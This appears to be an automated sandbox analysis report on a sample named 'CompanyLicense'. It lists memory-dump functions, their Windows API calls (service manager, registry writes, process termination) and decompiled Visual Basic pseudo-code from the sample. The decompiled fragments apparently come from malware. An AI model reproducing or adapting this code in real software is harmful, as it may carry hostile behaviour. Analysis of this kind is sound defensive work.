                                      • String ID: VB5!6&*
                                      • API String ID: 1341478452-3593831657
                                      • Opcode ID: ee55a2abea7be7e50601df3df5407d9d57722777f1712851239a1f9e70f32a2a
                                      • Instruction ID: d3e28c841db929235c7877c39c6b6bad081c35512a600fcfd5c01eba573c72dd
                                      • Opcode Fuzzy Hash: ee55a2abea7be7e50601df3df5407d9d57722777f1712851239a1f9e70f32a2a
                                      • Instruction Fuzzy Hash: BCE04EA568E3C21ED31357390D68829BF308E4322030A01EB80C2CF0E3C88C488EC3B7
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 909 (edge list omitted; node 958, 20a958c-20a9596, is the OpenSCManagerA call)
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction ID: ca6b0742df56396d42df22a48d24233af2990d11abec392d1a95f6c76734d54e
                                      • Opcode Fuzzy Hash: 1da4b11abcea70f6f38c6bd4cfe5ca3e0442990a793d84590e8cdcd952b51640
                                      • Instruction Fuzzy Hash: F6C1FB15D4D9CB07C21302B55469384FFB73E93934FC922EA9DA603A36D7622DB48BD2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1053 (edge list omitted; node 1060, 20a63f4-20a640f, is the GetLongPathNameW call)
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: d63b3d7f884463b7b86cac8e85bc1e0ea578b50880383fc9459a366bac0f3fdf
                                      • Instruction ID: b952f58eb696ebb692c823c1747a23162857eab56522328c65f1134544e8a28c
                                      • Opcode Fuzzy Hash: d63b3d7f884463b7b86cac8e85bc1e0ea578b50880383fc9459a366bac0f3fdf
                                      • Instruction Fuzzy Hash: 18814606C4D9C607C62302F55869290FFBB2D63824BC921DEADE60352BDB532DB49BD3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 1081 (edge list omitted; node 1151, 20a13fd-20a3caa, is the TerminateProcess call)
                                      APIs
                                        • Part of subcall function 020A6F5A: LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoadProcessTerminate
                                      • String ID:
                                      • API String ID: 3349790660-0
                                      • Opcode ID: fed15e8bacf1e0e0a90722e7d51ae5c5223626042997814a66a90886415eafea
                                      • Instruction ID: 212c6747a65ba9b1c79d8d63fec5cd149cc99b83f4b916c2d29fa38fd4fc27ef
                                      • Opcode Fuzzy Hash: fed15e8bacf1e0e0a90722e7d51ae5c5223626042997814a66a90886415eafea
                                      • Instruction Fuzzy Hash: 99717A20C087C207DB3212F85C667D8F7776F82734FD41299EDAA431A6D7A26CB48692
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 5a7ed105bffd6e262db7bc094bf646e3a5985201790a90167fae39b72e29eac7
                                      • Instruction ID: f88ee2ddc787480bf99af76f722a127cfa46a29ce55c269e7679fdf910d7fe3b
                                      • Opcode Fuzzy Hash: 5a7ed105bffd6e262db7bc094bf646e3a5985201790a90167fae39b72e29eac7
                                      • Instruction Fuzzy Hash: 43515911C08BC603CB3212F818657D8FB772F43634FD45299ADAA035A6D7A26DB496D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction ID: 84095f912e33c0c1ea88ec543e7b8cf7607ad801e8b5420552209f934ccd18b2
                                      • Opcode Fuzzy Hash: fecfd0d1c2151d77cc98b26efee1cbc1d6d3be94cd1b3b575fdf8d7702d5cff3
                                      • Instruction Fuzzy Hash: 5251D211D499CA4BC71302B55469384FBB33F52938FC922E9DDA603926D7626DB487C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 417e231660049f498d54b8ee9bc429322e4da0d114d183f1b9930741b34571cd
                                      • Instruction ID: 7684fba3d7f010611ab2c3aa173ea7b3e5cdc7e8301ef398aa7be2cff49ed5d7
                                      • Opcode Fuzzy Hash: 417e231660049f498d54b8ee9bc429322e4da0d114d183f1b9930741b34571cd
                                      • Instruction Fuzzy Hash: C7512814C08BC607CB2211F818A93D8FBB72F53624FD453D99DA6035B6D7A26CB49792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction ID: d8abac01dda19f1be9a2d308c335464d140b9bae24c969ddc2dc895f7d46cfea
                                      • Opcode Fuzzy Hash: 1083d16a5d037d2fe77abea0e78a05fe40d1023403d8b862aa5655e6446e527b
                                      • Instruction Fuzzy Hash: 3441C411E08ACA4BC72306B49469384FBB37F42628FC522D9DDA607976D7726DB4C7C2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6b0a416bf9ec837c602427384d6a912211f6ff4da87dd75a317aaeb87adeecab
                                      • Instruction ID: 095a43bbca57bbf4faa678ca6ae313dbf0c80f96143379b595e883fbc5f4caa7
                                      • Opcode Fuzzy Hash: 6b0a416bf9ec837c602427384d6a912211f6ff4da87dd75a317aaeb87adeecab
                                      • Instruction Fuzzy Hash: B6415620C08BC647CB2216F858653D8FBB72F53634FC453C9DDAA035A6D7622CB59792
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 523e81554d5a05ec062d0aecee98b432d9b932d16b3a6e0be8b66fc4692793a4
                                      • Instruction ID: 290dffb33b6e099076741be456bcd18abddd4c5b5de5edaaf34d18f4cec5ac43
                                      • Opcode Fuzzy Hash: 523e81554d5a05ec062d0aecee98b432d9b932d16b3a6e0be8b66fc4692793a4
                                      • Instruction Fuzzy Hash: 32418115C49AC603C62202F91869394FBB72F53A38FC522D99DFA035A6D7632DB487D3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction ID: 0625669338842c35f3185e844364a6d52de8067dcf6323464b1f35b03030894d
                                      • Opcode Fuzzy Hash: 1e22825d7a5db01c988214b0c8b7df49702fd5f8e987e5f8a87dbbe953031994
                                      • Instruction Fuzzy Hash: 1A316D15D499CB0BC22306F55469380FBB73E52938FC922DA9DA603936D7632DB8C7D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00000200,020A1DCD,?,?,?,?,020A542F,020A5406,?,020A3459,?,00000000,?,00400000), ref: 020A6409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: 8d7eca571039ba57eb9a651f958af724f28c0b75998a5e68d59cebb86131729d
                                      • Instruction ID: ae2ecb66432cde025ddc488167e720c7eb5f9e2fb3fa94aed614b51a0927189f
                                      • Opcode Fuzzy Hash: 8d7eca571039ba57eb9a651f958af724f28c0b75998a5e68d59cebb86131729d
                                      • Instruction Fuzzy Hash: 4F31D709C4D9C747C21302B51869290FF7A3D93828BC921DAADE64352BDB526D788BD3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction ID: 17342491092617538ee15175d706c772551a7310bbed1a8806d8ca3d7867390c
                                      • Opcode Fuzzy Hash: 00cec7d45faa68c3394dbd45594f487b17c93b1af1f42a03ae381eb91b5e5bcb
                                      • Instruction Fuzzy Hash: DB310631B0070DCEEB5A5EB4C9B87AD73E2AF41368FD44329C9518B9A0D33584C4D744
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ManagerOpen
                                      • String ID:
                                      • API String ID: 1889721586-0
                                      • Opcode ID: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction ID: 96eb4f5f8747c88025b24eff609d2fda6be987e3699c5c26ad9991ac3766f320
                                      • Opcode Fuzzy Hash: 81ba387514b4b9f58f765cde2aa5d0714d00e8ecfb57320ee9bf84fcadf8b792
                                      • Instruction Fuzzy Hash: 4F31FE05D499CB07C21306B55469380FFB72D53938BC922D99DB603936D7632DB887D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 9c6579e6e1d494bcebf3d3d45942a780aaee11cae329b57b1be1856aef88c9f0
                                      • Instruction ID: 4788fcbe123dfe70cccd3e4edd1a83775afec7b34335f580f435784670c5ca5f
                                      • Opcode Fuzzy Hash: 9c6579e6e1d494bcebf3d3d45942a780aaee11cae329b57b1be1856aef88c9f0
                                      • Instruction Fuzzy Hash: 0221CE05C499CB03C21212F91465684FB772D92934BC571DEADE603537D7622DB44BD3
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 37d68a8435de523fb03b8205e42a7b83d43b8fb8e480610d9adcda41fd16ccb2
                                      • Instruction ID: 5ddaee3bc187b9c6d11e5a3781cdba4c454b37ee04ee130224d80e8dcf342578
                                      • Opcode Fuzzy Hash: 37d68a8435de523fb03b8205e42a7b83d43b8fb8e480610d9adcda41fd16ccb2
                                      • Instruction Fuzzy Hash: 1021A405C498CB03C22202B5285A280FF763D93D38B8962D9ADBB1357BDB923D7487D2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • LoadLibraryA.KERNELBASE(?,321C9581,?,020A8349,020A32BD,00000000,00000000,00000000,00000000,?,00000000,00000000,020A0719,00000000), ref: 020A70A8
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID:
                                      • API String ID: 1029625771-0
                                      • Opcode ID: 333316bb146871931e86f4c42769b21623430b4709fcc6f6577310cbbb953688
                                      • Instruction ID: da4ab30113320da7ce75c8f2c1de94ba3b7877dec6db966674e58058fdcea018
                                      • Opcode Fuzzy Hash: 333316bb146871931e86f4c42769b21623430b4709fcc6f6577310cbbb953688
                                      • Instruction Fuzzy Hash: B9F0BB60500345FECB657FF89470FBEA6969F90365FD0C516F48595174CA348580AE91
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • RegSetValueExA.KERNELBASE(68F644E8,020A53BB,00000000,00000001,?,?,?,00000062,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A1C74
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: Value
                                      • String ID:
                                      • API String ID: 3702945584-0
                                      • Opcode ID: 469eee8ebd3e3eeff31f16080f35e31665fccafa1dfd15cb80a68d903528f736
                                      • Instruction ID: d18663404f8cb7d0de5a0d80504995ac762f7ad6cd04d2ea0d96e59707c0013b
                                      • Opcode Fuzzy Hash: 469eee8ebd3e3eeff31f16080f35e31665fccafa1dfd15cb80a68d903528f736
                                      • Instruction Fuzzy Hash: 64C08C7011032ABEFA206A104C2DFF76A29DB20790FA00011FD4780080C2A008A0C120
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,020A4127,020A4170,020A0A81,?,6DDC21B5,6DDB9555,?,321C9581), ref: 020A4162
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: CreateFile
                                      • String ID:
                                      • API String ID: 823142352-0
                                      • Opcode ID: cda1dba48740bd7b96318cf17742556920cb9191cb371ca8628f9592a64ccb55
                                      • Instruction ID: fb4e8a10fca13062ed22e8844e0c5964df734744d4ab3234c114c16073b3e70e
                                      • Opcode Fuzzy Hash: cda1dba48740bd7b96318cf17742556920cb9191cb371ca8628f9592a64ccb55
                                      • Instruction Fuzzy Hash: 90C09B717D4304B6FE3486209D5BFC562155F50F00F508509BF493C1C557F15551C519
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • GetLongPathNameW.KERNELBASE(?,?,00000200,020A1DCD,?,?,?,?,020A542F,020A5406,?,020A3459,?,00000000,?,00400000), ref: 020A6409
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LongNamePath
                                      • String ID:
                                      • API String ID: 82841172-0
                                      • Opcode ID: 4fae3519ba45faf50e482691a33078ce43044b0682cbaf733adcd1adfce0ec30
                                      • Instruction ID: ebdbc468bdaf990d5e42f97783f01cb94850ad1fa1d2e16b1e7bed6b8efccc79
                                      • Opcode Fuzzy Hash: 4fae3519ba45faf50e482691a33078ce43044b0682cbaf733adcd1adfce0ec30
                                      • Instruction Fuzzy Hash: 9DC04C75204300EBE6909A54CC88F9AB668BB54701F849405BA8586185C63098449B31
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      APIs
                                      • TerminateProcess.KERNELBASE(000000FF,00000000,00000000,000000FF,00000007,68F6454C,00000004,00000000,?,?,?,?,?,020A5210,020A555C,020A4170), ref: 020A3CA3
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: ProcessTerminate
                                      • String ID:
                                      • API String ID: 560597551-0
                                      • Opcode ID: 74751e9ee2263e4e98cc4fbd937d6dba48a7e67fd6933a660b04b1a42a213244
                                      • Instruction ID: 5207ce8731fd3eb2881ae61304ade273c69a32ca9e51b72e2e433430400e0280
                                      • Opcode Fuzzy Hash: 74751e9ee2263e4e98cc4fbd937d6dba48a7e67fd6933a660b04b1a42a213244
                                      • Instruction Fuzzy Hash: 52B0123420038711CD60176C2C2EBD822500F427F8F6403402C3A740D1DB9080864300
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Non-executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667892780.00000000020A0000.00000040.00000001.sdmp, Offset: 020A0000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_20a0000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: LibraryLoad
                                      • String ID: xsR@
                                      • API String ID: 1029625771-657063712
                                      • Opcode ID: 5e99369e2f4dbd95666e1e1ec8833a37c586e66ed69bc929f4ea37001b98ea52
                                      • Instruction ID: d07bf7116b9356981e2ad6d02261f4d3321e233c382c526685b216254a44abd5
                                      • Opcode Fuzzy Hash: 5e99369e2f4dbd95666e1e1ec8833a37c586e66ed69bc929f4ea37001b98ea52
                                      • Instruction Fuzzy Hash: DCB1BC71700702AFE758DF68CCA0BD9B3E5FF09310F998229EC9993641CB34A895DB90
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 61%
                                      			E00411266(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a20, void* _a40) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v40;
                                      				void* _v44;
                                      				void* _v52;
                                      				char _v56;
                                      				char _v60;
                                      				char _v76;
                                      				intOrPtr _v84;
                                      				intOrPtr _v92;
                                      				void* _v96;
                                      				signed int _v100;
                                      				intOrPtr* _v112;
                                      				signed int _v116;
                                      				char* _t56;
                                      				char* _t57;
                                      				char* _t61;
                                      				signed int _t65;
                                      				char* _t67;
                                      				void* _t91;
                                      				void* _t93;
                                      				intOrPtr _t94;
                                      
                                      				_t94 = _t93 - 0xc;
                                      				 *[fs:0x0] = _t94;
                                      				L004012E0();
                                      				_v16 = _t94;
                                      				_v12 = 0x401248;
                                      				_v8 = 0;
                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx, 0x5c,  *[fs:0x0], 0x4012e6, _t91);
                                      				L00401412();
                                      				L004013EE();
                                      				_v84 = _a4;
                                      				_v92 = 9;
                                      				L00401412();
                                      				_t56 =  &_v76;
                                      				_push(_t56);
                                      				L004013AC();
                                      				_v96 =  ~(0 | _t56 != 0x0000ffff);
                                      				L0040143C();
                                      				_t57 = _v96;
                                      				if(_t57 != 0) {
                                      					if( *0x413010 != 0) {
                                      						_v112 = 0x413010;
                                      					} else {
                                      						_push(0x413010);
                                      						_push(0x402b8c);
                                      						L0040142A();
                                      						_v112 = 0x413010;
                                      					}
                                      					_t61 =  &_v56;
                                      					L00401430();
                                      					_v96 = _t61;
                                      					_t65 =  *((intOrPtr*)( *_v96 + 0x130))(_v96,  &_v60, _t61,  *((intOrPtr*)( *((intOrPtr*)( *_v112)) + 0x308))( *_v112));
                                      					asm("fclex");
                                      					_v100 = _t65;
                                      					if(_v100 >= 0) {
                                      						_v116 = _v116 & 0x00000000;
                                      					} else {
                                      						_push(0x130);
                                      						_push(0x403ac4);
                                      						_push(_v96);
                                      						_push(_v100);
                                      						L0040145A();
                                      						_v116 = _t65;
                                      					}
                                      					_push(0);
                                      					_push(0);
                                      					_push(_v60);
                                      					_push( &_v76);
                                      					L00401424();
                                      					_push(1);
                                      					_t67 =  &_v76;
                                      					_push(_t67);
                                      					L00401418();
                                      					L0040141E();
                                      					_push(_t67);
                                      					L004013A6();
                                      					L0040140C();
                                      					_push( &_v60);
                                      					_t57 =  &_v56;
                                      					_push(_t57);
                                      					_push(2);
                                      					L00401406();
                                      					L0040143C();
                                      				}
                                      				_push(0x41140e);
                                      				L0040143C();
                                      				L0040140C();
                                      				return _t57;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 00411282
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 004112AC
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 004112B7
                                      • __vbaVarDup.MSVBVM60 ref: 004112CF
                                      • #562.MSVBVM60(?), ref: 004112D8
                                      • __vbaFreeVar.MSVBVM60(?), ref: 004112EF
                                      • __vbaNew2.MSVBVM60(00402B8C,00413010,?), ref: 00411313
                                      • __vbaObjSet.MSVBVM60(?,00000000,?,?,?,?,?), ref: 00411340
                                      • __vbaHresultCheckObj.MSVBVM60(00000000,?,00403AC4,00000130,?,?,?,?,?), ref: 00411375
                                      • __vbaLateIdCallLd.MSVBVM60(?,?,00000000,00000000,?,?,?,?,?), ref: 0041138E
                                      • __vbaStrVarMove.MSVBVM60(?,00000001,?,?,?,004012E6), ref: 0041139C
                                      • __vbaStrMove.MSVBVM60(?,00000001,?,?,?,004012E6), ref: 004113A6
                                      • #580.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 004113AC
                                      • __vbaFreeStr.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 004113B4
                                      • __vbaFreeObjList.MSVBVM60(00000002,?,?,00000000,?,00000001,?,?,?,004012E6), ref: 004113C3
                                      • __vbaFreeVar.MSVBVM60(00000000,?,00000001,?,?,?,004012E6), ref: 004113CE
                                      • __vbaFreeVar.MSVBVM60(0041140E,?), ref: 00411400
                                      • __vbaFreeStr.MSVBVM60(0041140E,?), ref: 00411408
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.667445520.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.667442253.0000000000400000.00000002.00020000.sdmp
                                      • Associated: 00000000.00000002.667457492.0000000000413000.00000004.00020000.sdmp
                                      • Associated: 00000000.00000002.667461596.0000000000415000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_CompanyLicense.jbxd
                                      Similarity
                                      • API ID: __vba$Free$Move$#562#580CallCheckChkstkCopyHresultLateListNew2
                                      • String ID:
                                      • API String ID: 2788452748-0
                                      • Opcode ID: 3dbf35cb02a4955189acaf7678027ac11abcae840226aa9cc9c93d900ac3fc9b
                                      • Instruction ID: 6f4b6da79870560e2800a84909d0d70356a4cdb8e9f83d64f06db6890049b8a7
                                      • Opcode Fuzzy Hash: 3dbf35cb02a4955189acaf7678027ac11abcae840226aa9cc9c93d900ac3fc9b
                                      • Instruction Fuzzy Hash: 8E41FA75900208ABDB00EFE1C895FDDBBB8AF08704F50412AF515BB1B5DB789946CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      C-Code - Quality: 75%
                                      			E004118D3(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a8, void* _a24, void* _a60) {
                                      				intOrPtr _v8;
                                      				intOrPtr _v12;
                                      				intOrPtr _v16;
                                      				void* _v40;
                                      				void* _v56;
                                      				intOrPtr _v60;
                                      				char _v64;
                                      				void* _v88;
                                      				char _v104;
                                      				char* _v128;
                                      				char _v136;
                                      				intOrPtr _v144;
                                      				char _v152;
                                      				short _v156;
                                      				short _t40;
                                      				short _t41;
                                      				void* _t58;
                                      				void* _t60;
                                      				intOrPtr _t61;
                                      
                                      				_t61 = _t60 - 0xc;
                                      				 *[fs:0x0] = _t61;
                                      				L004012E0();
                                      				_v16 = _t61;
                                      				_v12 = 0x4012a8;
                                      				_v8 = 0;
                                      				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4012e6, _t58);
                                      				L00401412();
                                      				L00401412();
                                      				L00401412();
                                      				L004013EE();
                                      				_v128 =  &_v64;
                                      				_v136 = 0x4008;
                                      				_push(1);
                                      				_push( &_v136);
                                      				_push( &_v104);
                                      				L0040138E();
                                      				_v144 = 0x403c14;
                                      				_v152 = 0x8008;
                                      				_push( &_v104);
                                      				_t40 =  &_v152;
                                      				_push(_t40);
                                      				L00401394();
                                      				_v156 = _t40;
                                      				L0040143C();
                                      				_t41 = _v156;
                                      				if(_t41 != 0) {
                                      					_push(0x98);
                                      					L00401388();
                                      					_v60 = _t41;
                                      				}
                                      				_push(0x4119eb);
                                      				L0040143C();
                                      				L0040143C();
                                      				L0040140C();
                                      				L0040143C();
                                      				return _t41;
                                      			}

                                      APIs
                                      • __vbaChkstk.MSVBVM60(?,004012E6), ref: 004118F1
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 0041191B
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411926
                                      • __vbaVarDup.MSVBVM60(?,?,?,?,004012E6), ref: 00411931
                                      • __vbaStrCopy.MSVBVM60(?,?,?,?,004012E6), ref: 0041193E
                                      • #619.MSVBVM60(?,00004008,00000001), ref: 00411960
                                      • __vbaVarTstNe.MSVBVM60(?,?,?,00004008,00000001), ref: 00411984
